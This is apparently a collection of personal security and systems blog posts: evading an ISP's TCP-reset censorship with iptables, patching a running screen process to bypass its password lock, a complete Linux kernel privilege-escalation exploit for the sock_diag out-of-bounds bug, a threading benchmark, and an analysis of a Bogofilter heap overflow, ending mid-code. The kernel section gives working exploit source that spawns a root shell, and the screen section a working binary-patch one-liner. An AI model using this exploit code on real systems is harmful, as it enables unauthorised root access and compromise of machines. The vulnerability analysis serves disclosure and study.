This is actually implemented in a pretty rudimentary, yet effective way (if you have no clue how TCP/IP works). If a request to a forbidden resource is made, the connection is immediately shut down by the proxy. In the shutdown packet, an <iframe> code is placed that displays the image:

<iframe src="http://94.201.7.202:8080/webadmin/deny/index.php?dpid=20&

dpruleid=7&cat=105&ttl=0&groupname=Du_Public_IP_Address&policyname=default&

username=94.XX.0.0&userip=94.XX.XX.XX&connectionip=1.0.0.127&

nsphostname=YYYYYYYYYY.du.ae&protocol=nsef&dplanguage=-&url=http%3a%2f%2f

pastehtml%2ecom%2fview%2fc336prjrl%2ertxt"

width="100%" height="100%" frameborder=0></iframe>



Capturing the TCP packets while making a forbidden request – in this case: a list of banned URLs in the UAE, which itself is banned – reveals one crucial thing: The GET request actually reaches the web server, but before the answer arrives, the proxy has already sent the Reset-Connection-Packets. (Naturally, that is much faster, because it is physically closer.)

Because the client thinks the connection is closed, it will itself send out Reset-Packets to the Webserver in reply to its packets containing the reply (“the webpage”). This actually shuts down the connection in both directions. All of this happens on the TCP level, thus by “client” I mean the operating system. The client application just opens a TCP socket and sees it closed via the result code coming from the OS.

You can see the initial reset-packets from the proxy as entries 5 and 6 in the list; the later RST packets originate from my computer because the TCP stack considers the connection closed.

How to circumvent it

First, we need to find out at which point our HTTP connection is being hijacked. To do this, we search for the characteristic TCP packet with the FIN, PSH, ACK bits set, while making a request that is blocked. The output will be something like:

$ sudo tcpdump -v "tcp[13] = 0x019"

18:38:35.368715 IP (tos 0x0, ttl 57, ... proto TCP (6), length 522)

host-88-80-29-58.cust.prq.se.http > 192.168.40.73.37630: Flags [FP.], ...
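In case the filter expression looks cryptic: byte 13 of the TCP header holds the flag bits, and 0x19 is simply FIN, PSH and ACK or-ed together. A tiny sketch of that arithmetic (the FLAG_* names are chosen for this example, the bit values are the standard TCP ones):

```c
#include <stdint.h>

/* Bit values within the TCP flags byte (byte 13 of the TCP header). */
enum {
    FLAG_FIN = 0x01,
    FLAG_SYN = 0x02,
    FLAG_RST = 0x04,
    FLAG_PSH = 0x08,
    FLAG_ACK = 0x10,
    FLAG_URG = 0x20
};

/* 0x01 | 0x08 | 0x10 = 0x19, the value used in the tcpdump filter. */
static const uint8_t FIN_PSH_ACK = FLAG_FIN | FLAG_PSH | FLAG_ACK;

/* Like the filter, this matches only if exactly these three flags are set. */
int is_fin_psh_ack(uint8_t flags)
{
    return flags == FIN_PSH_ACK;
}
```

A plain RST+ACK packet has the flag byte 0x14 and is therefore not matched by this particular filter.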

We are only interested in the TTL of the FIN-PSH-ACK packets: By subtracting this from the default TTL of 64 (which the provider seems to be using), we get the number of hops between us and the host. Looking at a traceroute we see that obviously, the host that is 64 - 57 = 7 hops away is located at the local ISP. (Never mind the un-routable 10.* appearing in the traceroute. Seeing this was the initial reason for me to think these guys are not too proficient in network technology, no offense.)

$ mtr --report --report-wide --report-cycles=1 pastehtml.com

HOST: mjanja Loss% Snt Last Avg Best Wrst StDev

1.|-- 192.168.40.1 0.0% 1 2.9 2.9 2.9 2.9 0.0

2.|-- 94.XX.XX.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0

3.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0

4.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0

5.|-- 10.100.35.78 0.0% 1 6.8 6.8 6.8 6.8 0.0

6.|-- 94.201.0.2 0.0% 1 7.7 7.7 7.7 7.7 0.0

7.|-- 94.201.0.25 0.0% 1 8.4 8.4 8.4 8.4 0.0

8.|-- 195.229.27.85 0.0% 1 11.1 11.1 11.1 11.1 0.0

9.|-- csk012.emirates.net.ae 0.0% 1 27.3 27.3 27.3 27.3 0.0

10.|-- 195.229.3.215 0.0% 1 146.6 146.6 146.6 146.6 0.0

11.|-- decix-ge-2-7.i2b.se 0.0% 1 156.2 156.2 156.2 156.2 0.0

12.|-- sth-cty1-crdn-1-po1.i2b.se 0.0% 1 164.7 164.7 164.7 164.7 0.0

13.|-- 178.16.212.57 0.0% 1 151.6 151.6 151.6 151.6 0.0

14.|-- cust-prq-nt.i2b.se 0.0% 1 157.5 157.5 157.5 157.5 0.0

15.|-- tunnel3.prq.se 0.0% 1 161.5 161.5 161.5 161.5 0.0

16.|-- host-88-80-29-58.cust.prq.se 0.0% 1 192.5 192.5 192.5 192.5 0.0

We now know that with a very high probability, all “connection termination” attempts from this close to us – relative to a TTL of 64, which is set by the sender – are the censorship proxy doing its work. So we simply ignore all packets with the RST or FIN flag set that come from port 80 too close to us:

for mask in FIN,PSH,ACK RST,ACK; do

sudo iptables -I INPUT -p tcp --sport 80 \

-m tcp --tcp-flags $mask $mask \

-m ttl --ttl-gt 55 -m ttl --ttl-lt 64 \

-j DROP;

done

NB: --ttl-gt matches TTLs strictly greater than the given value, so to catch the observed TTL of 57 we have to check for greater than 56, and I subtract one more to be on the safe side. You can also leave out the TTL part, but then “regular” TCP terminations remain unseen by the OS, which many programs will find weird (and sometimes data comes with a packet that closes the connection, and this data would be lost).
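To make the TTL window explicit, here is the same condition as a small C predicate. It is a sketch of what the two ttl matches in the rule express, with a hypothetical function name; it is not how iptables implements the match internally.

```c
#include <stdbool.h>

/*
 * Mirrors "-m ttl --ttl-gt 55 -m ttl --ttl-lt 64":
 * both comparisons are strict, so TTLs 56..63 match.
 */
bool ttl_rule_matches(int ttl)
{
    return ttl > 55 && ttl < 64;
}
```

The forged packets with TTL 57 fall inside the window, while a packet that arrives with the full TTL of 64 (for example from the local network) does not.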



That’s it. Since the first reply packet from the server is

dropped, or rather replaced with the packet containing the <iframe>

code, we rely on TCP retransmission, and sure enough, some 0.21 seconds

later the same TCP packet is retransmitted, this time not harmed in

any way:

The OS re-orders the packets and is able to assemble the TCP stream. Thus, by simply ignoring two packets the provider sends to us, we have an (almost perfectly) working TCP connection to wherever we want.

Why like this?

I suppose the provider is using relatively old Cisco equipment. For example, some of their documentation hints at how the filtering is implemented. See this PDF, p. 39-5:

When filtering is enabled and a request for content is directed through the security appliance, the request is sent to the content server and to the filtering server at the same time. If the filtering server allows the connection, the security appliance forwards the response from the content server to the originating client. If the filtering server denies the connection, the security appliance drops the response and sends a message or return code indicating that the connection was not successful.

The other big provider in the UAE uses a different filtering technique, which does not rely on TCP hacks but employs a real HTTP proxy. (I heard someone mention “Bluecoat” but have no data to back it up.)

Locking a screen session

The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:

This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)

This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.

The password is checked on the server side (which usually runs with setuid root) here:

if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {

...

AddStr("\r\nPassword incorrect.\r\n");

...

}

If I am root, I can patch the running binary. Ultimately, I want to circumvent this password check. But we need to do some preparation:

First, find the string about the incorrect password that is passed to AddStr. Since this is a compile-time constant, it is stored in the .rodata section of the ELF.

Just fire up GDB on the screen binary, list the sections (abridged for brevity here)…

(gdb) maintenance info sections

Exec file:

`/usr/bin/screen', file type elf64-x86-64.

...

0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS

0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS

0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS

...

… and search for said string in the .rodata section:

(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"

0x45148a

warning: Unable to access target memory at 0x455322, halting search.

1 pattern found.

Now, we need to locate the piece of code comparing the password. Let’s first search for the call to AddStr by taking advantage of the fact that we know the address of the string that will be passed as the argument. We search in .text for the address of the string:

(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a

0x41b371

1 pattern found.

Now there should be a jne instruction shortly before that (this instruction stands for “jump if not equal” and has the opcode 0x75). Let’s search for it:

(gdb) find/b 0x41b371-0x100, +0x100, 0x75

0x41b2f2

1 pattern found.

Decode the instruction:

(gdb) x/i 0x41b2f2

0x41b2f2: jne 0x41b370

This is it. (If you want to be sure, look at the instructions before that. Shortly before, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)

Now we can simply patch the live binary, changing 0x75 to 0x74 (jne to je or “jump if equal”), thus effectively inverting the if expression. Find the screen server process (it’s written in all caps in the ps output, i.e. SCREEN) and patch it like this, where =(cmd) is a Z-Shell shortcut for “create temporary file and delete it after the command finishes”:

$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")

All done. Just attach using screen -x, but be sure not to enter the correct password: That’s the only one that will not give you access now.
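Why does changing a single byte invert the condition? On x86 the short conditional jumps occupy the opcodes 0x70 to 0x7f, and each condition sits right next to its negation, so flipping the lowest bit of the opcode swaps jne (0x75) and je (0x74). The following sketch applies that to a byte buffer instead of a live process; the function name is made up for illustration.

```c
#include <stddef.h>

/*
 * Invert a short conditional jump in place by flipping the lowest
 * opcode bit. Returns 0 on success, or -1 (leaving the byte untouched)
 * if the byte is not a short Jcc opcode.
 */
int invert_short_jcc(unsigned char *opcode)
{
    if (opcode == NULL || *opcode < 0x70 || *opcode > 0x7f)
        return -1;
    *opcode ^= 0x01;
    return 0;
}
```

For the instruction found above, the two bytes would be 0x75 0x7c (the displacement 0x7c follows from 0x41b370 - 0x41b2f4); only the first byte changes, so the jump target stays the same.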

Privilege Escalation Kernel Exploit

So my friend Nico tweeted that there is an “easy linux kernel privilege escalation” and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some Russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, as I discovered later. They differ in technique and reliability, and I guess others can do better than me.

I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

So we should do exactly that! One of the hardest parts was actually finding out how to send such a NetLink message, but I’ll come to that later. Let’s first have a look at the code that was patched (this is from net/core/sock_diag.c):

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)

{

int err;

struct sock_diag_req *req = nlmsg_data(nlh);

const struct sock_diag_handler *hndl;

if (nlmsg_len(nlh) < sizeof(*req))

return -EINVAL;

/* check for "req->sdiag_family >= AF_MAX" goes here */

hndl = sock_diag_lock_handler(req->sdiag_family);

if (hndl == NULL)

err = -ENOENT;

else

err = hndl->dump(skb, nlh);

sock_diag_unlock_handler(hndl);

return err;

}

The function sock_diag_lock_handler() locks a mutex and effectively returns sock_diag_handlers[req->sdiag_family], i.e. it indexes the array with the unsanitized family number received in the NetLink request. Since AF_MAX is 40, we can make it return memory from after the end of sock_diag_handlers (“out-of-bounds access”) if we specify a family greater than or equal to 40. This memory is accessed as a

struct sock_diag_handler {

__u8 family;

int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);

};

… and err = hndl->dump(skb, nlh); calls the function pointed to in the dump field.
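To see what the missing check buys, here is a small userspace model of such a handler table. It is a sketch only: the names are hypothetical, the struct is simplified, and it does not reproduce the kernel code. The point is the single comparison before the array is indexed.

```c
#include <stddef.h>

#define MODEL_AF_MAX 40 /* AF_MAX as quoted in the text; hypothetical name */

struct model_handler {
    unsigned char family;
    int (*dump)(void);
};

static const struct model_handler *model_handlers[MODEL_AF_MAX];

/* Register a handler; refuses families that do not fit into the table. */
int model_register(const struct model_handler *h)
{
    if (h->family >= MODEL_AF_MAX)
        return -1;
    model_handlers[h->family] = h;
    return 0;
}

/* Look up a handler; out-of-range families never reach the array. */
const struct model_handler *model_lookup(unsigned int family)
{
    if (family >= MODEL_AF_MAX) /* the kind of check the fix adds */
        return NULL;
    return model_handlers[family];
}
```

Without the comparison in model_lookup(), a family such as 43 would read whatever happens to be stored behind the table and treat it as a handler pointer.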

So we know: The Kernel follows a pointer to a sock_diag_handler struct, and calls the function stored there. If we find some suitable and (more or less) predictable value after the end of the array, then we might store a specially crafted struct at the referenced address that contains a pointer to some code that will escalate the privileges of the current process. The main function looks like this:

int main(int argc, char **argv)

{

prepare_privesc_code();

spray_fake_handler((void *)0x0000000000010000);

trigger();

return execv("/bin/sh", (char *[]) { "sh", NULL });

}

First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.

/* privilege escalation code */

#define KERNCALL __attribute__((regparm(3)))

void * (*prepare_kernel_cred)(void *) KERNCALL;

void * (*commit_creds)(void *) KERNCALL;

/* match the signature of a sock_diag_handler dumper function */

int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)

{

commit_creds(prepare_kernel_cred(0));

return 0;

}

/* look up an exported Kernel symbol */

void *findksym(const char *sym)

{

void *p, *ret;

FILE *fp;

char s[1024];

size_t sym_len = strlen(sym);

fp = fopen("/proc/kallsyms", "r");

if(!fp)

err(-1, "cannot open kallsyms: fopen");

ret = NULL;

while(fscanf(fp, "%p %*c %1024s\n", &p, s) == 2) {

if(!!strncmp(sym, s, sym_len))

continue;

ret = p;

break;

}

fclose(fp);

return ret;

}

void prepare_privesc_code(void)

{

prepare_kernel_cred = findksym("prepare_kernel_cred");

commit_creds = findksym("commit_creds");

}

This is pretty standard, and you’ll find many variations of that in different exploits.

Now we spray a struct containing this function pointer over a sizable amount of memory:

void spray_fake_handler(const void *addr)

{

void *pp;

int po;

/* align to page boundary */

pp = (void *) ((ulong)addr & ~0xfffULL);

pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

if(pp == MAP_FAILED)

err(-1, "mmap");

struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };

for(po = 0; po < 0x10000; po += sizeof(hndl))

memcpy(pp + po, &hndl, sizeof(hndl));

}

The memory is mapped with MAP_FIXED, which makes mmap() take the memory location as the de facto location, not merely a hint. The location must be a multiple of the page size (which is 4096 or 0x1000 by default), and on most modern systems you cannot map the zero-page (or other low pages); consult sysctl vm.mmap_min_addr for the lowest address you may map. (This is to foil attempts to map code to the zero-page to take advantage of a Kernel NULL pointer dereference.)

Now for the actual trigger. To get an idea of what we can do, we should first inspect what comes after the sock_diag_handlers array in the currently running Kernel (this is only possible with root permissions). Since the array is static to that file, we cannot look up the symbol. Instead, we look up the address of a function that accesses said array, sock_diag_register():

$ grep -w sock_diag_register /proc/kallsyms

ffffffff812b6aa2 T sock_diag_register

If this returns all zeroes, try grepping in /boot/System.map-$(uname -r) instead. Then disassemble the function. I annotated the relevant points with the corresponding C code:

$ sudo gdb -c /proc/kcore

(gdb) x/23i 0xffffffff812b6aa2

0xffffffff812b6aa2: push %rbp

0xffffffff812b6aa3: mov %rdi,%rbp

0xffffffff812b6aa6: push %rbx

0xffffffff812b6aa7: push %rcx

0xffffffff812b6aa8: cmpb $0x27,(%rdi) ; if (hndl->family >= AF_MAX)

0xffffffff812b6aab: ja 0xffffffff812b6ae5

0xffffffff812b6aad: mov $0xffffffff81668c20,%rdi

0xffffffff812b6ab4: mov $0xfffffff0,%ebx

0xffffffff812b6ab9: callq 0xffffffff813628ee ; mutex_lock(&sock_diag_table_mutex);

0xffffffff812b6abe: movzbl 0x0(%rbp),%eax

0xffffffff812b6ac2: cmpq $0x0,-0x7e7fe930(,%rax,8) ; if (sock_diag_handlers[hndl->family])

0xffffffff812b6acb: jne 0xffffffff812b6ad7

0xffffffff812b6acd: mov %rbp,-0x7e7fe930(,%rax,8) ; sock_diag_handlers[hndl->family] = hndl;

0xffffffff812b6ad5: xor %ebx,%ebx

0xffffffff812b6ad7: mov $0xffffffff81668c20,%rdi

0xffffffff812b6ade: callq 0xffffffff813628db

0xffffffff812b6ae3: jmp 0xffffffff812b6aea

0xffffffff812b6ae5: mov $0xffffffea,%ebx

0xffffffff812b6aea: pop %rdx

0xffffffff812b6aeb: mov %ebx,%eax

0xffffffff812b6aed: pop %rbx

0xffffffff812b6aee: pop %rbp

0xffffffff812b6aef: retq

The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value at the address -0x7e7fe930 (which is a shorthand for 0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight being the size of a pointer on a 64-bit system, and %rax holding the byte that the preceding movzbl loaded from the address of the first argument to the function, which is the first member of the (not packed) struct, i.e. the family field. So this line is an array access, and we know that sock_diag_handlers is located at -0x7e7fe930.

(All these steps can actually be done without root permissions: You can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r) && dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start GDB on the resulting ELF file. Only for the next step do you actually need to inspect the main memory.)

(gdb) x/46xg -0x7e7fe930

0xffffffff818016d0: 0x0000000000000000 0x0000000000000000

0xffffffff818016e0: 0x0000000000000000 0x0000000000000000

0xffffffff818016f0: 0x0000000000000000 0x0000000000000000

0xffffffff81801700: 0x0000000000000000 0x0000000000000000

0xffffffff81801710: 0x0000000000000000 0x0000000000000000

0xffffffff81801720: 0x0000000000000000 0x0000000000000000

0xffffffff81801730: 0x0000000000000000 0x0000000000000000

0xffffffff81801740: 0x0000000000000000 0x0000000000000000

0xffffffff81801750: 0x0000000000000000 0x0000000000000000

0xffffffff81801760: 0x0000000000000000 0x0000000000000000

0xffffffff81801770: 0x0000000000000000 0x0000000000000000

0xffffffff81801780: 0x0000000000000000 0x0000000000000000

0xffffffff81801790: 0x0000000000000000 0x0000000000000000

0xffffffff818017a0: 0x0000000000000000 0x0000000000000000

0xffffffff818017b0: 0x0000000000000000 0x0000000000000000

0xffffffff818017c0: 0x0000000000000000 0x0000000000000000

0xffffffff818017d0: 0x0000000000000000 0x0000000000000000

0xffffffff818017e0: 0x0000000000000000 0x0000000000000000

0xffffffff818017f0: 0x0000000000000000 0x0000000000000000

0xffffffff81801800: 0x0000000000000000 0x0000000000000000

0xffffffff81801810: 0x0000000000000000 0x0000000000000000

0xffffffff81801820: 0x000000000000000a 0x0000000000017570

0xffffffff81801830: 0xffffffff8135a666 0xffffffff816740a0

(gdb) p (0xffffffff81801828- -0x7e7fe930)/8

$1 = 43
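The two calculations above (turning the 32-bit displacement into a full address, and turning an address back into an array index) can be double-checked with a little C. The function names are hypothetical; the constants are the ones from my GDB session and will differ on other Kernels.

```c
#include <stdint.h>

/* Sign-extend a 32-bit displacement to a 64-bit address, as the CPU does. */
uint64_t sign_extend_disp32(int32_t disp)
{
    return (uint64_t)(int64_t)disp;
}

/* Index of the pointer-sized slot at addr in an array starting at base. */
uint64_t slot_index(uint64_t base, uint64_t addr)
{
    return (addr - base) / sizeof(uint64_t);
}
```

sign_extend_disp32(-0x7e7fe930) yields 0xffffffff818016d0, and the slot at 0xffffffff81801828 is index 43, i.e. three entries past the last valid index 39.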

So now I know that in the Kernel I’m currently running, at the current moment, sock_diag_handlers[43] is 0x0000000000017570, which is a low address, but hopefully not too low. (Nico reported 0x17670, and a current grml live cd in KVM has 0x17470 there.) So we need to send a NetLink message with SOCK_DIAG_BY_FAMILY type set in the header, flags at least NLM_F_REQUEST and the family set to 43. This is what the trigger does:

void trigger(void)

{

int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);

if (nl < 0)

err(-1, "socket");

struct {

struct nlmsghdr hdr;

struct sock_diag_req r;

} req;

memset(&req, 0, sizeof(req));

req.hdr.nlmsg_len = sizeof(req);

req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;

req.hdr.nlmsg_flags = NLM_F_REQUEST;

req.r.sdiag_family = 43; /* guess right offset */

if(send(nl, &req, sizeof(req), 0) < 0)

err(-1, "send");

}

All done! Compiling might be difficult, since you need Kernel struct definitions. I used -idirafter and my Kernel headers.

$ make

gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c

$ ./kex

# id

uid=0(root) gid=0(root) groups=0(root)



Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:

But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…

Update: The Protection Fault occurs when first following a bogus function pointer. After that, the exploit can no longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)

Concurrent Hashing is an Embarrassingly Parallel Problem

So I was reading some rather not so clever code today. I had a gut feeling something was wrong with the code, since I had never seen an idiom like that. A server that does a little hash calculation with lots of threads – and the function that computes the hash had a peculiar feature: Its entire body was wrapped in a mutex lock/unlock pair on a function-static mutex initialized with PTHREAD_MUTEX_INITIALIZER, like this:

static EVP_MD_CTX mdctx;

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static unsigned char first = 1;

pthread_mutex_lock(&lock);

if (first) {

EVP_MD_CTX_init(&mdctx);

first = 0;

}

/* the actual hash computation using &mdctx */

pthread_mutex_unlock(&lock);

In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.

The computation code inside the function looks roughly like this:

if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||

!EVP_DigestUpdate(&mdctx, input, inputlen) ||

!EVP_DigestFinal(&mdctx, hash, &md_len)) {

ERR_print_errors_fp(stderr);

exit(-1);

}

This is the typical OpenSSL pattern: You tell it to initialize mdctx to compute the SHA256 digest, then you “update” the digest (i.e., you feed it some bytes) and then you tell it to finish, storing the resulting hash in hash. If any of the functions fails, the OpenSSL error is printed and the program exits.

So the lock mutex really only protects the mdctx (short for ‘message digest context’). And my gut feeling was that re-initializing the context all the time (i.e. copying stuff around) is much cheaper than synchronizing all the hash operations (i.e., having one stupid bottleneck).

To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)

First, I have to create a dataset. In order for it to be the same all the time, I use rand_r() with a hard-coded seed, so that over all iterations, the random data set is actually identical:

#define DATANUM 10000000

#define DATASIZE 16

static char data[DATANUM][DATASIZE];

void init_data(void)

{

int n, i;

unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */

char alpha[] = "abcdefghijklmnopqrstuvwxyz";

for(n = 0; n < DATANUM; n++)

for(i = 0; i < DATASIZE; i++)

data[n][i] = alpha[rand_r(&seedp) % 26];

}

Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.

Then I start num threads on equally-sized slices of data while recording and printing out timing statistics:

void hash_all(int num)

{

int i;

pthread_t *t;

struct fromto *ft;

struct timespec start, end;

double delta;

clock_gettime(CLOCK_MONOTONIC, &start);

t = malloc(num * sizeof *t);

for(i = 0; i < num; i++) {

ft = malloc(sizeof(struct fromto));

ft->from = i * (DATANUM/num);

ft->to = ((i+1) * (DATANUM/num)) > DATANUM ?

DATANUM : (i+1) * (DATANUM/num);

pthread_create(&t[i], NULL, hash_slice, ft);

}

for(i = 0; i < num; i++)

pthread_join(t[i], NULL);

clock_gettime(CLOCK_MONOTONIC, &end);

delta = end.tv_sec - start.tv_sec;

delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;

printf("%d threads: %lu hashes/s, total = %.3fs\n",

num, (unsigned long) (DATANUM / delta), delta);

free(t);

sleep(1);

}
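A side note on the slicing: DATANUM/num is an integer division, so with 12 threads each slice has 833333 entries and 12 * 833333 = 9999996, which means the last four entries are never assigned to any thread. That does not matter for the benchmark, but if you want every entry covered, the remainder can be spread over the first few slices. A minimal sketch, assuming half-open [from, to) ranges and using a made-up struct and function name:

```c
#include <stddef.h>

struct slice {
    size_t from; /* inclusive */
    size_t to;   /* exclusive */
};

/*
 * Slice number i out of num over total items. The first (total % num)
 * slices get one extra item, so all slices together cover 0..total.
 */
struct slice slice_for(size_t total, size_t num, size_t i)
{
    size_t base = total / num;
    size_t extra = total % num;
    struct slice s;

    s.from = i * base + (i < extra ? i : extra);
    s.to = s.from + base + (i < extra ? 1 : 0);
    return s;
}
```

The slices differ in size by at most one entry, so the threads still get practically the same amount of work.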

Each thread runs the hash_slice() function, which linearly iterates over the slice and calls hash_one(n) for each entry. With preprocessor macros, I define two versions of this function:

void hash_one(int num)

{

int i;

unsigned char hash[EVP_MAX_MD_SIZE];

unsigned int md_len;

#ifdef LOCK_STATIC_EVP_MD_CTX

static EVP_MD_CTX mdctx;

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static unsigned char first = 1;

pthread_mutex_lock(&lock);

if (first) {

EVP_MD_CTX_init(&mdctx);

first = 0;

}

#else

EVP_MD_CTX mdctx;

EVP_MD_CTX_init(&mdctx);

#endif

/* the actual hashing from above */

#ifdef LOCK_STATIC_EVP_MD_CTX

pthread_mutex_unlock(&lock);

#endif

return;

}

The Makefile produces two binaries:

$ make

gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c

gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c

… and the result is as expected. On my Intel i7-2620M (two cores, four hardware threads):

$ ./speedtest-copied

1 threads: 1999113 hashes/s, total = 5.002s

2 threads: 3443722 hashes/s, total = 2.904s

4 threads: 3709510 hashes/s, total = 2.696s

8 threads: 3665865 hashes/s, total = 2.728s

12 threads: 3650451 hashes/s, total = 2.739s

24 threads: 3642619 hashes/s, total = 2.745s

$ ./speedtest-locked

1 threads: 2013590 hashes/s, total = 4.966s

2 threads: 857542 hashes/s, total = 11.661s

4 threads: 631336 hashes/s, total = 15.839s

8 threads: 932238 hashes/s, total = 10.727s

12 threads: 850431 hashes/s, total = 11.759s

24 threads: 802501 hashes/s, total = 12.461s

And on an Intel Xeon X5650 24 core machine:

$ ./speedtest-copied

1 threads: 1564546 hashes/s, total = 6.392s

2 threads: 1973912 hashes/s, total = 5.066s

4 threads: 3821067 hashes/s, total = 2.617s

8 threads: 5096136 hashes/s, total = 1.962s

12 threads: 5849133 hashes/s, total = 1.710s

24 threads: 7467990 hashes/s, total = 1.339s

$ ./speedtest-locked

1 threads: 1481025 hashes/s, total = 6.752s

2 threads: 701797 hashes/s, total = 14.249s

4 threads: 338231 hashes/s, total = 29.566s

8 threads: 318873 hashes/s, total = 31.360s

12 threads: 402054 hashes/s, total = 24.872s

24 threads: 304193 hashes/s, total = 32.874s

So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: All the mutex waiting slows the program down so much that you’d better only use one thread or else you lose.

Rule of thumb: If you don’t have a good argument for a multithreaded application, simply don’t take the extra effort of implementing it in the first place.

Details on CVE-2012-5468

In mid-2010 I found a heap corruption in Bogofilter which led to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so there’s a new Bogofilter release since yesterday, thanks to the maintainers. (Neither of the bugs has much potential for exploitation, for different reasons.)

I want to shed some light on the details about the new CVE-2012-5468 here: It’s a very subtle bug that arises from the error handling of the character set conversion library iconv.

The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:

Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.

The problematic code doesn’t look problematic at first glance. Nor at second glance. Take a look yourself.

The version here is abridged for brevity: Convert from inbuf to outbuf, handling possible iconv failures.

count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);

if (count == (size_t)(-1)) {

int err = errno;

switch (err) {

case EILSEQ: /* invalid multibyte sequence */

case EINVAL: /* incomplete multibyte sequence */

if (!replace_nonascii_characters)

*outbuf = *inbuf;

else

*outbuf = '?';

/* update counts and pointers */

inbytesleft -= 1;

outbytesleft -= 1;

inbuf += 1;

outbuf += 1;

break;

case E2BIG: /* output buffer has no more room */

/* TODO: Provide proper handling of E2BIG */

done = true;

break;

default:

break;

}

}

The iconv API is simple and straightforward: You pass a handle (which among other things contains the source and destination character set; it is called xd here), and two buffers and modifiable integers for the input and output, respectively. (Usually, when transcoding, the function reads one symbol from the source, converts it to another character set, and then “drains” the input buffer by decreasing inbytesleft by the number of bytes that made up the source symbol. Then, the output length is checked, and if the target symbol fits, it is appended and the outbytesleft integer is decreased by how much space the symbol used.)

The API function returns -1 in case of an error.

The Bogofilter code contains a copy&paste of the error cases from the iconv(3) man page. If you read the libiconv source carefully, you’ll find that …

/* Case 2: not enough bytes available to detect anything */

errno = EINVAL;

comes before

/* Case 4: k bytes read, making up a wide character */

if (outleft == 0) {

cd->istate = last_istate;

errno = E2BIG;

...

}

So the “certain pathological cases” the SA talks about are met if a chunk of data that is large enough to fill the output buffer makes iconv return -1 because it just happens to end in an incomplete multibyte sequence. But at that point you have no guarantee from the library that your output buffer can take any more bytes. Appending that character or a ? sign causes an out-of-bounds write. (This is really subtle. I don’t blame anyone for not noticing this, although sanity checks – if need be via assert(outbytesleft > 0) – are always in order when you do complicated modify-string-on-copy stuff.) Additionally, outbytesleft will be decreased below zero (as an unsigned size_t it wraps around to a huge value instead of becoming -1), and thus even a later outbytesleft == 0 check will be false.
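To illustrate the kind of guard that is missing, here is a sketch of a helper that writes the fallback byte only if there is room left. This is not the actual Bogofilter fix, and the function name is made up; it merely shows the check described above.

```c
#include <stddef.h>

/*
 * Write one fallback byte to the output buffer, but only if there is room.
 * Returns 0 on success, or -1 if the buffer is full; in that case neither
 * the pointer nor the counter is modified.
 */
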